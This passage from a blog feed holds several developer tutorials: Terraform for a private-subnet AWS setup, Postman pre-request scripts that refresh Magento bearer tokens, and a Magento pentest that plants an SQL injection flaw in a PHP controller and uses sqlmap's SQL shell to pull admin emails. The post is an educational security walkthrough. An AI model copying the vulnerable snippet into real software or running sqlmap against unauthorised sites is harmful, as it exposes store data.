  The solution
&lt;/h2&gt;

&lt;p&gt;We are going to use terraform to launch an EC2 instance from an AMI inside a private subnet, blocking external access.&lt;/p&gt;

&lt;p&gt;We will utilise a NAT Gateway to allow the EC2 instance to make outbound connections for security updates.&lt;/p&gt;

&lt;p&gt;&lt;a href="https://media.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Ff3mud2e0akr0tr8bjip5.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Ff3mud2e0akr0tr8bjip5.png" alt="AWS Network Diagram showing private subnet and NAT gateway"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;h3&gt;
  
  
  Create provider.tf
&lt;/h3&gt;

&lt;p&gt;First up, let's create a &lt;strong&gt;provider.tf&lt;/strong&gt; file to let terraform know we will be using the aws provider:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;provider "aws" {
    region = "${var.AWS_REGION}"
}
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;h3&gt;
  
  
  Create vars.tf
&lt;/h3&gt;

&lt;p&gt;You will notice above that we're already using variables. Let's create our &lt;strong&gt;vars.tf&lt;/strong&gt; file to store these.&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;variable "AWS_REGION" {    
    default = "eu-west-1"
}
variable "AMI" {
    type = map(string)

    default = {
        # For demo purposes only, we are using ubuntu for the web1 and db1 instances
        eu-west-1 = "ami-08ca3fed11864d6bb" # Ubuntu 20.04 x86
    }
}
variable "EC2_USER" {
    default = "ubuntu"
}
variable "PUBLIC_KEY_PATH" {
    default = "~/.ssh/id_rsa.pub" # Replace this with a path to your public key
}
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;h3&gt;
  
  
  Create vpc.tf
&lt;/h3&gt;

&lt;p&gt;Next up, let's create our VPC that will contain one public subnet and one private subnet. We will create this inside of the &lt;strong&gt;eu-west-1a&lt;/strong&gt; availability zone:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;resource "aws_vpc" "prod-vpc" {
    cidr_block = "10.0.0.0/16"
    enable_dns_support = "true"
    enable_dns_hostnames = "true"

    tags = {
        Name = "prod-vpc"
    }
}

resource "aws_subnet" "prod-subnet-public-1" {
    vpc_id = "${aws_vpc.prod-vpc.id}"
    cidr_block = "10.0.1.0/24"
    map_public_ip_on_launch = "true" # This is what makes it a public subnet
    availability_zone = "eu-west-1a"
    tags = {
        Name = "prod-subnet-public-1"
    }
}

resource "aws_subnet" "prod-subnet-private-1" {
    vpc_id = "${aws_vpc.prod-vpc.id}"
    cidr_block = "10.0.2.0/24"
    availability_zone = "eu-west-1a"
    tags = {
        Name = "prod-subnet-private-1"
    }
}
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;h3&gt;
  
  
  Create network.tf
&lt;/h3&gt;

&lt;p&gt;Now for the interesting part. We need to create the internet gateway, and the routes for subnets to communicate. Finally we will create the NAT Gateway.&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;# Add internet gateway
resource "aws_internet_gateway" "prod-igw" {
    vpc_id = "${aws_vpc.prod-vpc.id}"
    tags = {
        Name = "prod-igw"
    }
}

# Public routes
resource "aws_route_table" "prod-public-crt" {
    vpc_id = "${aws_vpc.prod-vpc.id}"

    route {
        cidr_block = "0.0.0.0/0" 
        gateway_id = "${aws_internet_gateway.prod-igw.id}" 
    }

    tags = {
        Name = "prod-public-crt"
    }
}
resource "aws_route_table_association" "prod-crta-public-subnet-1"{
    subnet_id = "${aws_subnet.prod-subnet-public-1.id}"
    route_table_id = "${aws_route_table.prod-public-crt.id}"
}

# Private routes
resource "aws_route_table" "prod-private-crt" {
    vpc_id = "${aws_vpc.prod-vpc.id}"

    route {
        cidr_block = "0.0.0.0/0"
        nat_gateway_id = "${aws_nat_gateway.prod-nat-gateway.id}" 
    }

    tags = {
        Name = "prod-private-crt"
    }
}
resource "aws_route_table_association" "prod-crta-private-subnet-1"{
    subnet_id = "${aws_subnet.prod-subnet-private-1.id}"
    route_table_id = "${aws_route_table.prod-private-crt.id}"
}

# NAT Gateway to allow private subnet to connect out the way
resource "aws_eip" "nat_gateway" {
    vpc = true
}
resource "aws_nat_gateway" "prod-nat-gateway" {
    allocation_id = aws_eip.nat_gateway.id
    subnet_id     = "${aws_subnet.prod-subnet-public-1.id}"

    tags = {
    Name = "VPC Demo - NAT"
    }

    # To ensure proper ordering, add Internet Gateway as dependency
    depends_on = [aws_internet_gateway.prod-igw]
}
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;h3&gt;
  
  
  Create security group
&lt;/h3&gt;

&lt;p&gt;Then add a security group. Please note this is very open; you should limit SSH access to your own IP address.&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;# Security Group
resource "aws_security_group" "ssh-allowed" {
    vpc_id = "${aws_vpc.prod-vpc.id}"

    egress {
        from_port = 0
        to_port = 0
        protocol = -1
        cidr_blocks = ["0.0.0.0/0"]
    }
    ingress {
        from_port = 22
        to_port = 22
        protocol = "tcp"
        // Do not use this in production, should be limited to your own IP
        cidr_blocks = ["0.0.0.0/0"]
    }
    ingress {
        from_port = 80
        to_port = 80
        protocol = "tcp"
        cidr_blocks = ["0.0.0.0/0"]
    }
    tags = {
        Name = "ssh-allowed"
    }
}
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;h3&gt;
  
  
  Create ec2.tf
&lt;/h3&gt;

&lt;p&gt;Now to create our sample web app. We will use an ubuntu 20.04 AMI for demo purposes.&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;resource "aws_instance" "web1" {
    ami = "${lookup(var.AMI, var.AWS_REGION)}"
    instance_type = "t2.micro"

    subnet_id = "${aws_subnet.prod-subnet-public-1.id}"
    vpc_security_group_ids = ["${aws_security_group.ssh-allowed.id}"]
    key_name = "${aws_key_pair.ireland-region-key-pair.id}"

    tags = {
        Name: "My VPC Demo 2"
    }
}
// Sends your public key to the instance
resource "aws_key_pair" "ireland-region-key-pair" {
    key_name = "ireland-region-key-pair"
    public_key = "${file(var.PUBLIC_KEY_PATH)}"
}
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;h3&gt;
  
  
  Create database.tf
&lt;/h3&gt;

&lt;p&gt;We will also use an Ubuntu 20.04 AMI to create a demo instance that will act as our private database:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;# This is just a mock example of a database to test out VPCs
resource "aws_instance" "db1" {
    ami = "${lookup(var.AMI, var.AWS_REGION)}"
    instance_type = "t2.micro"

    subnet_id = "${aws_subnet.prod-subnet-private-1.id}"
    vpc_security_group_ids = ["${aws_security_group.ssh-allowed.id}"]
    key_name = "${aws_key_pair.ireland-region-key-pair.id}"

    tags = {
        Name: "My VPC Demo DB"
    }
}
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;h2&gt;
  
  
  Summary
&lt;/h2&gt;

&lt;p&gt;Now that we have our Terraform infrastructure defined, we can initialise it by running:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;terraform init
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;Next, we can review and launch it by running:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;terraform plan
terraform apply
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;&lt;strong&gt;Important&lt;/strong&gt;: the above commands will cause AWS to start billing you.&lt;/p&gt;

&lt;p&gt;Then, once we're done testing, we can run:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;terraform destroy
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;By utilising Terraform we now have reusable boilerplate that lets us get started more quickly in future, and it greatly reduces the chances of private servers being exposed to the world.&lt;/p&gt;

</description>
      <category>terraform</category>
      <category>aws</category>
      <category>security</category>
    </item>
    <item>
      <title>Using Postman with dynamic bearer tokens the right way</title>
      <dc:creator>Rhuaridh</dc:creator>
      <pubDate>Sun, 28 Nov 2021 16:11:46 +0000</pubDate>
      <link>https://dev.to/rhuaridh/using-postman-with-dynamic-bearer-tokens-the-right-way-15ma</link>
      <guid>https://dev.to/rhuaridh/using-postman-with-dynamic-bearer-tokens-the-right-way-15ma</guid>
      <description>&lt;h2&gt;
  
  
  The challenge
&lt;/h2&gt;

&lt;p&gt;This article will focus on Magento, but it can apply to any API that uses a bearer token for authentication.&lt;/p&gt;

&lt;p&gt;Magento's API uses an expiring bearer token for authorization. This means that you will need to routinely pull down a new bearer token in order to keep using the API.&lt;/p&gt;

&lt;p&gt;This is a great security feature, but adds a layer of complexity when it comes to debugging the API locally.&lt;/p&gt;

&lt;p&gt;I will show you the best way to dynamically retrieve the bearer token inside your Postman request so that you can debug your API properly and unhindered.&lt;/p&gt;

&lt;p&gt;Magento's API auth can be defined in three steps:&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;Use admin login details to fetch bearer token&lt;/li&gt;
&lt;li&gt;Use bearer token to access all other protected API calls&lt;/li&gt;
&lt;li&gt;Refresh bearer token as needed&lt;/li&gt;
&lt;/ul&gt;
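&lt;p&gt;The first step can also be reproduced outside Postman. As a hedged sketch (the store URL and credentials below are placeholders for your own values), Magento's token endpoint accepts the admin credentials as a JSON body and returns the bearer token as a JSON string:&lt;/p&gt;

```
curl -X POST "https://your-store-url.com/rest/all/V1/integration/admin/token" \
  -H "Content-Type: application/json" \
  -d '{"username": "demo", "password": "SomeUniquePasswordFrogApple12"}'
```

&lt;p&gt;Every subsequent protected call then passes that token in the Authorization header.&lt;/p&gt;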

&lt;h2&gt;
  
  
  Create a Magento admin user
&lt;/h2&gt;

&lt;p&gt;For this REST API we will use a standard Magento 2 admin account. Create an admin account and give it the role required to access the resources you need.&lt;/p&gt;

&lt;p&gt;In my case I created a demo user:&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;demo
SomeUniquePasswordFrogApple12
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;

&lt;p&gt;And assigned the full &lt;strong&gt;Administrators&lt;/strong&gt; role for simplicity. In a real world example you should give the API account the minimum access required.&lt;/p&gt;

&lt;h2&gt;
  
  
  Create new Environment called Magento2
&lt;/h2&gt;

&lt;p&gt;Inside postman we need to create a new &lt;strong&gt;Environment&lt;/strong&gt;. This is where we will configure all of our store specific variables.&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;| Variable         | Value                         |
| magento_token    |                               |
| magento_url      | https://your-store-url.com    |
| magento_username | demo                          |
| magento_password | SomeUniquePasswordFrogApple12 |
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;Now remember to click "&lt;strong&gt;Save&lt;/strong&gt;" so that these variables can be used.&lt;/p&gt;

&lt;p&gt;&lt;a href="https://res.cloudinary.com/practicaldev/image/fetch/s--maIdZaRe--/c_limit%2Cf_auto%2Cfl_progressive%2Cq_auto%2Cw_880/https://dev-to-uploads.s3.amazonaws.com/uploads/articles/jgrw1jdhlahnqualaori.png" class="article-body-image-wrapper"&gt;&lt;img src="https://res.cloudinary.com/practicaldev/image/fetch/s--maIdZaRe--/c_limit%2Cf_auto%2Cfl_progressive%2Cq_auto%2Cw_880/https://dev-to-uploads.s3.amazonaws.com/uploads/articles/jgrw1jdhlahnqualaori.png" alt="Postman create environment" width="880" height="205"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;h2&gt;
  
  
  Create a postman request
&lt;/h2&gt;

&lt;p&gt;Create a new Collection called Magento2 to organise our Magento requests.&lt;/p&gt;

&lt;p&gt;Within this collection we can create our first API request called "&lt;strong&gt;List Products&lt;/strong&gt;"&lt;/p&gt;

&lt;p&gt;Create a &lt;strong&gt;GET&lt;/strong&gt; request with URL:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;{{magento_url}}/rest/all/V1/products
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;Note that it uses our &lt;strong&gt;magento_url&lt;/strong&gt; environment variable we configured earlier.&lt;/p&gt;

&lt;h2&gt;
  
  
  Add environment to our request
&lt;/h2&gt;

&lt;p&gt;Make sure you add the Magento2 environment to this request so it can access our newly created variables.&lt;/p&gt;

&lt;p&gt;&lt;a href="https://res.cloudinary.com/practicaldev/image/fetch/s--rpV0VOxE--/c_limit%2Cf_auto%2Cfl_progressive%2Cq_auto%2Cw_880/https://dev-to-uploads.s3.amazonaws.com/uploads/articles/mztn14hqwt9z3cqkhc4n.png" class="article-body-image-wrapper"&gt;&lt;img src="https://res.cloudinary.com/practicaldev/image/fetch/s--rpV0VOxE--/c_limit%2Cf_auto%2Cfl_progressive%2Cq_auto%2Cw_880/https://dev-to-uploads.s3.amazonaws.com/uploads/articles/mztn14hqwt9z3cqkhc4n.png" alt="Postman set environment" width="718" height="416"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;h2&gt;
  
  
  Add query parameters
&lt;/h2&gt;

&lt;p&gt;Since we are using the list product API call we need to add the required &lt;strong&gt;searchCriteria&lt;/strong&gt; field.&lt;/p&gt;

&lt;p&gt;Under &lt;strong&gt;Params&lt;/strong&gt;, add:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;| Variable                    | Value |
| searchCriteria[pageSize]    | 10    |
| searchCriteria[currentPage] | 1     |
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;&lt;a href="https://res.cloudinary.com/practicaldev/image/fetch/s--ERCXjXtk--/c_limit%2Cf_auto%2Cfl_progressive%2Cq_auto%2Cw_880/https://dev-to-uploads.s3.amazonaws.com/uploads/articles/4xl1q300eqi7gkzuqsfp.png" class="article-body-image-wrapper"&gt;&lt;img src="https://res.cloudinary.com/practicaldev/image/fetch/s--ERCXjXtk--/c_limit%2Cf_auto%2Cfl_progressive%2Cq_auto%2Cw_880/https://dev-to-uploads.s3.amazonaws.com/uploads/articles/4xl1q300eqi7gkzuqsfp.png" alt="Postman params" width="880" height="395"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;h2&gt;
  
  
  Set up bearer token authorisation
&lt;/h2&gt;

&lt;p&gt;Under &lt;strong&gt;Authorization&lt;/strong&gt;, set the type to &lt;strong&gt;Bearer Token&lt;/strong&gt;.&lt;/p&gt;

&lt;p&gt;Then set the token value to:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;{{magento_token}}
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;Because the bearer token will change over time we are using our &lt;strong&gt;magento_token&lt;/strong&gt; environment variable here. We will configure this in the next section.&lt;/p&gt;

&lt;p&gt;Your setup should look like this:&lt;/p&gt;

&lt;p&gt;&lt;a href="https://res.cloudinary.com/practicaldev/image/fetch/s--jtrNiyQt--/c_limit%2Cf_auto%2Cfl_progressive%2Cq_auto%2Cw_880/https://dev-to-uploads.s3.amazonaws.com/uploads/articles/qk0ep8rg8gr446phhp67.png" class="article-body-image-wrapper"&gt;&lt;img src="https://res.cloudinary.com/practicaldev/image/fetch/s--jtrNiyQt--/c_limit%2Cf_auto%2Cfl_progressive%2Cq_auto%2Cw_880/https://dev-to-uploads.s3.amazonaws.com/uploads/articles/qk0ep8rg8gr446phhp67.png" alt="Postman set bearer" width="880" height="402"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;h2&gt;
  
  
  Configure dynamic bearer token
&lt;/h2&gt;

&lt;p&gt;Now this is where the magic happens. Before every request to the API we will fetch a fresh bearer token from Magento, so the request always carries a valid token.&lt;/p&gt;

&lt;p&gt;Inside our &lt;strong&gt;List Products&lt;/strong&gt; API request, we can add a "&lt;strong&gt;Pre-request Script&lt;/strong&gt;" that will be executed before each request.&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;function getQueryString (obj) {
    return Object.keys(obj).map((key) =&amp;gt; `${key}=${obj[key]}`).join('&amp;amp;');
}

const qs = {
    'username': postman.getEnvironmentVariable("magento_username"),
    'password': postman.getEnvironmentVariable("magento_password")
};

pm.sendRequest({
    url: postman.getEnvironmentVariable("magento_url") + '/rest/all/V1/integration/admin/token?' + getQueryString(qs),
    method: 'POST',
    header: {
        'content-type': 'application/json',
    },
}, function (err, res) {
    var magento_token = res.json();
    postman.setEnvironmentVariable("magento_token", magento_token);
});
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;If you read through the script you'll notice it takes the Magento username and password environment variables we configured earlier, queries the Magento token endpoint, and saves the resulting bearer token as &lt;strong&gt;magento_token&lt;/strong&gt;.&lt;/p&gt;
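&lt;p&gt;One caveat worth knowing: the helper in the script does not URL-encode values, so a password containing reserved characters (an ampersand or an equals sign, for example) would corrupt the query string. A hedged variant of the same helper, with encoding added:&lt;/p&gt;

```javascript
// Variant of getQueryString that percent-encodes each key and value,
// so credentials containing reserved characters survive the query string.
function getQueryString(obj) {
    return Object.keys(obj)
        .map((key) => `${encodeURIComponent(key)}=${encodeURIComponent(obj[key])}`)
        .join('&');
}

// The ampersand and equals sign in the password are percent-encoded:
console.log(getQueryString({ username: 'demo', password: 'p&ss=word' }));
// → username=demo&password=p%26ss%3Dword
```

&lt;p&gt;Drop this in as a straight replacement for the original helper; the rest of the pre-request script is unchanged.&lt;/p&gt;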

&lt;p&gt;Your postman configuration should look like this:&lt;/p&gt;

&lt;p&gt;&lt;a href="https://res.cloudinary.com/practicaldev/image/fetch/s--LcBKqHKT--/c_limit%2Cf_auto%2Cfl_progressive%2Cq_auto%2Cw_880/https://dev-to-uploads.s3.amazonaws.com/uploads/articles/kpmxtq2lw1khxjohedx2.png" class="article-body-image-wrapper"&gt;&lt;img src="https://res.cloudinary.com/practicaldev/image/fetch/s--LcBKqHKT--/c_limit%2Cf_auto%2Cfl_progressive%2Cq_auto%2Cw_880/https://dev-to-uploads.s3.amazonaws.com/uploads/articles/kpmxtq2lw1khxjohedx2.png" alt="Postman set pre request script" width="880" height="402"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;h2&gt;
  
  
  Send request
&lt;/h2&gt;

&lt;p&gt;And that's it! We can now click "&lt;strong&gt;Send&lt;/strong&gt;" and we should retrieve a json response containing the first 10 products in the store:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;{
    "items": [
        {
            "id": 1,
            "sku": "24-MB01",
            "name": "Joust Duffle Bag",
            "attribute_set_id": 15,
            "price": 34,
            ...
        },
        ...
    ],
    "search_criteria": {
        "filter_groups": [],
        "page_size": 10,
        "current_page": 1
    },
    "total_count": 2046
}
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;&lt;a href="https://res.cloudinary.com/practicaldev/image/fetch/s--YPUJYaa0--/c_limit%2Cf_auto%2Cfl_progressive%2Cq_auto%2Cw_880/https://dev-to-uploads.s3.amazonaws.com/uploads/articles/omd6ryew6ecx7wjd8f3m.png" class="article-body-image-wrapper"&gt;&lt;img src="https://res.cloudinary.com/practicaldev/image/fetch/s--YPUJYaa0--/c_limit%2Cf_auto%2Cfl_progressive%2Cq_auto%2Cw_880/https://dev-to-uploads.s3.amazonaws.com/uploads/articles/omd6ryew6ecx7wjd8f3m.png" alt="Postman response" width="880" height="645"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;h2&gt;
  
  
  Closing thoughts
&lt;/h2&gt;

&lt;p&gt;This is quick to set up, and quick to adapt to other platforms that use bearer tokens in their API.&lt;/p&gt;

&lt;p&gt;If you are like me and work across a number of Magento stores daily, then you can configure multiple environments in Postman this way and switch between them seamlessly.&lt;/p&gt;

</description>
      <category>api</category>
      <category>postman</category>
      <category>magento</category>
      <category>webdev</category>
    </item>
    <item>
      <title>Magento Tips - Pentest with sqlmap</title>
      <dc:creator>Rhuaridh</dc:creator>
      <pubDate>Sat, 13 Nov 2021 17:12:05 +0000</pubDate>
      <link>https://dev.to/rhuaridh/magento-tips-pentest-with-sqlmap-1cn0</link>
      <guid>https://dev.to/rhuaridh/magento-tips-pentest-with-sqlmap-1cn0</guid>
      <description>&lt;h2&gt;
  
  
  Pentest Magento2
&lt;/h2&gt;

&lt;p&gt;Magento 2 is popular and hard to upgrade. This creates the perfect breeding ground for insecure eCommerce stores which hackers love to exploit.&lt;/p&gt;

&lt;p&gt;A common tool used by penetration testers to detect insecure sites is sqlmap.&lt;/p&gt;

&lt;p&gt;In a nutshell, sqlmap is an open source tool that automates the process of detecting and exploiting SQL injection flaws.&lt;/p&gt;

&lt;h2&gt;
  
  
  Install sqlmap
&lt;/h2&gt;

&lt;p&gt;First we need to install sqlmap locally. This assumes that you already have Python installed.&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;git clone --depth 1 https://github.com/sqlmapproject/sqlmap.git sqlmap-dev
cd sqlmap-dev
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;

&lt;p&gt;It should go without saying that you should only ever use sqlmap against your own websites.&lt;/p&gt;

&lt;p&gt;&lt;a href="https://res.cloudinary.com/practicaldev/image/fetch/s--w9foPu2y--/c_limit%2Cf_auto%2Cfl_progressive%2Cq_auto%2Cw_880/https://dev-to-uploads.s3.amazonaws.com/uploads/articles/y699zoj4xolbaaorlajd.png" class="article-body-image-wrapper"&gt;&lt;img src="https://res.cloudinary.com/practicaldev/image/fetch/s--w9foPu2y--/c_limit%2Cf_auto%2Cfl_progressive%2Cq_auto%2Cw_880/https://dev-to-uploads.s3.amazonaws.com/uploads/articles/y699zoj4xolbaaorlajd.png" alt="Installing sqlmap" width="880" height="202"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;h2&gt;
  
  
  Create a sample SQL injection flaw to test
&lt;/h2&gt;

&lt;p&gt;For testing purposes, on our local site we can create a SQL injection flaw to test this against. It is important that you never deploy this code live for obvious reasons.&lt;/p&gt;

&lt;p&gt;In my case, I just added this to my test controller:&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;$connection = $this-&amp;gt;_resourceConnection-&amp;gt;getConnection();
$year = $_GET["year"] ?? 2021;
$rows = $connection-&amp;gt;fetchAll("SELECT count(*) as total FROM sales_order WHERE created_at = $year");
$total = $rows[0]['total'] ?? 0;
echo "Hello World. There are $total orders on this site.";
exit;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;

&lt;p&gt;As you can see, we are bypassing the ORM and failing to escape or validate the $year input variable. This should never be done, yet it is not uncommon to see in third-party extensions.&lt;/p&gt;
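&lt;p&gt;For contrast, here is a minimal sketch of the safe version of the same query, assuming the same controller context. Magento's connection adapter supports positional placeholders, which bind and escape the value for you:&lt;/p&gt;

```php
// Safe variant: cast the input and bind it, never interpolate it.
$connection = $this->_resourceConnection->getConnection();
$year = (int) ($_GET["year"] ?? 2021);
$rows = $connection->fetchAll(
    "SELECT count(*) as total FROM sales_order WHERE created_at = ?",
    [$year]
);
$total = $rows[0]['total'] ?? 0;
```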

&lt;p&gt;Here is what our vulnerable extension looks like:&lt;/p&gt;

&lt;p&gt;&lt;a href="https://res.cloudinary.com/practicaldev/image/fetch/s--AcEVihkD--/c_limit%2Cf_auto%2Cfl_progressive%2Cq_auto%2Cw_880/https://dev-to-uploads.s3.amazonaws.com/uploads/articles/24f1adsd2x0hjp54qbty.png" class="article-body-image-wrapper"&gt;&lt;img src="https://res.cloudinary.com/practicaldev/image/fetch/s--AcEVihkD--/c_limit%2Cf_auto%2Cfl_progressive%2Cq_auto%2Cw_880/https://dev-to-uploads.s3.amazonaws.com/uploads/articles/24f1adsd2x0hjp54qbty.png" alt="Hello world extension" width="742" height="378"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;h2&gt;
  
  
  Finding a vulnerable parameter
&lt;/h2&gt;

&lt;p&gt;Find your Magento store URL; I will use &lt;a href="https://magento.rhuaridh.co.uk/"&gt;https://magento.rhuaridh.co.uk/&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;So on our local machine, we can now run sqlmap:&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;python3 sqlmap.py -u https://magento.rhuaridh.co.uk/helloworld/index/helloworld?year=2021 \
--dbms=mysql \
--sql-shell
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;

&lt;p&gt;This command will quickly identify that the year parameter is vulnerable. The --sql-shell flag will then open a shell for us to run queries in.&lt;/p&gt;

&lt;p&gt;&lt;a href="https://res.cloudinary.com/practicaldev/image/fetch/s--axSLuGRI--/c_limit%2Cf_auto%2Cfl_progressive%2Cq_auto%2Cw_880/https://dev-to-uploads.s3.amazonaws.com/uploads/articles/09a13wiem0se1oc0g2b2.png" class="article-body-image-wrapper"&gt;&lt;img src="https://res.cloudinary.com/practicaldev/image/fetch/s--axSLuGRI--/c_limit%2Cf_auto%2Cfl_progressive%2Cq_auto%2Cw_880/https://dev-to-uploads.s3.amazonaws.com/uploads/articles/09a13wiem0se1oc0g2b2.png" alt="Finding a vuln" width="880" height="384"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;h2&gt;
  
  
  Retrieving data
&lt;/h2&gt;

&lt;p&gt;For example, to pull a list of admin e-mail addresses you can run:&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;SELECT email FROM admin_user;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;

&lt;p&gt;And that's it! That is how easy it is. We now have a list of all the admin e-mail addresses on the Magento 2 store.&lt;/p&gt;

&lt;p&gt;&lt;a href="https://res.cloudinary.com/practicaldev/image/fetch/s--OVQ7EFzU--/c_limit%2Cf_auto%2Cfl_progressive%2Cq_auto%2Cw_880/https://dev-to-uploads.s3.amazonaws.com/uploads/articles/k654askfzqwpostlnwo9.png" class="article-body-image-wrapper"&gt;&lt;img src="https://res.cloudinary.com/practicaldev/image/fetch/s--OVQ7EFzU--/c_limit%2Cf_auto%2Cfl_progressive%2Cq_auto%2Cw_880/https://dev-to-uploads.s3.amazonaws.com/uploads/articles/k654askfzqwpostlnwo9.png" alt="Retrieving data from sqlmap" width="880" height="308"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;h2&gt;
  
  
  How do I stop SQL injection?
&lt;/h2&gt;

&lt;p&gt;Always make sure you use the ORM, never interpolate variables directly into a query string, and always validate user-supplied input. It's as simple as that!&lt;/p&gt;

&lt;p&gt;Best practice exists for a reason.&lt;/p&gt;

</description>
    </item>
    <item>
      <title>Rate Limit specific URLs using Nginx</title>
      <dc:creator>Rhuaridh</dc:creator>
      <pubDate>Tue, 09 Nov 2021 09:31:15 +0000</pubDate>
      <link>https://dev.to/rhuaridh/rate-limit-specific-urls-using-nginx-1lni</link>
      <guid>https://dev.to/rhuaridh/rate-limit-specific-urls-using-nginx-1lni</guid>
      <description>&lt;h2&gt;
  
  
  Why rate limit?
&lt;/h2&gt;

&lt;p&gt;Rate limiting is a simple way of stopping users (hopefully just the bad ones!) from accessing more of your site's resources than you would like.&lt;/p&gt;

&lt;p&gt;I will show you a simple way to rate limit specific URLs by using Nginx.&lt;/p&gt;

&lt;h2&gt;
  
  
  Video Walkthrough
&lt;/h2&gt;

&lt;p&gt;The written instructions are below, but here is a quick video walkthrough showing how to apply rate limiting in Nginx.&lt;/p&gt;

&lt;p&gt;&lt;iframe width="710" height="399" src="https://www.youtube.com/embed/ZWjyhkvBfFA"&gt;
&lt;/iframe&gt;
&lt;/p&gt;

&lt;h2&gt;
  
  
  How to add rate limiting in nginx
&lt;/h2&gt;

&lt;p&gt;At the top of your nginx configuration file, you can define a map like so:&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;limit_req_zone $binary_remote_addr_map zone=mylimit:10m rate=5r/s;
limit_req_status 429;

map $request_uri $binary_remote_addr_map {
    default "";
    ~^/what-is-new.html $binary_remote_addr;
    ~^/another-url-to-rate-limit.html $binary_remote_addr;
}
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;

&lt;p&gt;Then within your location block, add:&lt;/p&gt;

